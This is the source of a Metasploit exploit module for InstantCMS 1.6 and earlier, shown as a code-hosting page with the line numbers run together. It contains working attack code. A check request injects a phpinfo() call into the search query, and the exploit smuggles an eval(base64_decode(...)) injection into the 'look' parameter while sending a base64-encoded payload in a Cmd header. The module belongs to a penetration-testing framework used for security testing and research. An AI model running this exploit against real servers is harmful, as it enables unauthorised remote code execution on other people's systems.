Path: blob/master/modules/exploits/unix/webapp/instantcms_exec.rb
25476 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'InstantCMS 1.6 Remote PHP Code Execution',15'Description' => %q{16This module exploits an arbitrary PHP command execution vulnerability because of a17dangerous use of eval() in InstantCMS in versions 1.6 and prior.18},19'Author' => [20'AkaStep', # Vulnerability discovery and PoC21'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module22'juan vazquez' # Metasploit module23],24'License' => MSF_LICENSE,25'References' => [26[ 'CVE', '2013-10051' ],27[ 'BID', '60816' ],28[ 'PACKETSTORM', '122176' ]29],30'Privileged' => false,31'Platform' => 'php',32'Arch' => ARCH_PHP,33'Targets' => [34[ 'InstantCMS 1.6', {} ],35],36'DisclosureDate' => '2013-06-26',37'DefaultTarget' => 0,38'Notes' => {39'Reliability' => UNKNOWN_RELIABILITY,40'Stability' => UNKNOWN_STABILITY,41'SideEffects' => UNKNOWN_SIDE_EFFECTS42}43)44)4546register_options(47[48OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"])49]50)51end5253def check54res = send_request_cgi({55'uri' => normalize_uri(target_uri.to_s),56'vars_get' =>57{58'view' => 'search',59'query' => '${echo phpinfo()}'60}61})6263if res and res.body.match(/Build Date/)64return Exploit::CheckCode::Vulnerable65end6667Exploit::CheckCode::Safe68end6970def exploit71print_status("Executing payload...")7273res = send_request_cgi({74'uri' => normalize_uri(target_uri.to_s),75'vars_get' =>76{77'view' => 'search',78'query' => rand_text_alpha(3 + rand(3)),79'look' => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//"80},81'headers' => {82'Cmd' => Rex::Text.encode_base64(payload.encoded)83}84})85end86end878889